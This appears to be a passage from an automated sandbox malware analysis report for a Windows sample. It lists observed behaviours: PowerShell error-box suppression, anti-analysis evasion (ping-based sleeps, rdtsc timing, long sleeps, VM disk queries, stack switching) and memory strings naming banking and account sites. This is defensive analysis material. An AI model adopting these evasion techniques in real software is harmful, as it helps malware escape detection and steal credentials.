Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB4430154

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\appidtel.exe

Code function: 10_2_0397D1C0 rdtsc

10_2_0397D1C0

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2870	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2356	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 901	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 499	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4538	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5231	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\appidtel.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\convert.exe	API coverage: 1.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 2870 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400	Thread sleep count: 2356 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816	Thread sleep count: 4538 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416	Thread sleep count: 5231 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe TID: 5984	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2084	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 62v53-Zo.19.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: wscript.exe, 00000000.00000003.2237011145.000002AAA8628000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pBimoLvibqemuGW@
Source: 62v53-Zo.19.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: 62v53-Zo.19.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: wscript.exe, 00000000.00000003.2356219177.000002AAAA601000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pBimoLvibqemuGW
Source: 62v53-Zo.19.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 62v53-Zo.19.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: svchost.exe, 0000001B.00000002.3539084412.0000021B3DA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.3540606559.0000021B42E42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.3540671763.0000021B42E56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 62v53-Zo.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 62v53-Zo.19.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 62v53-Zo.19.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
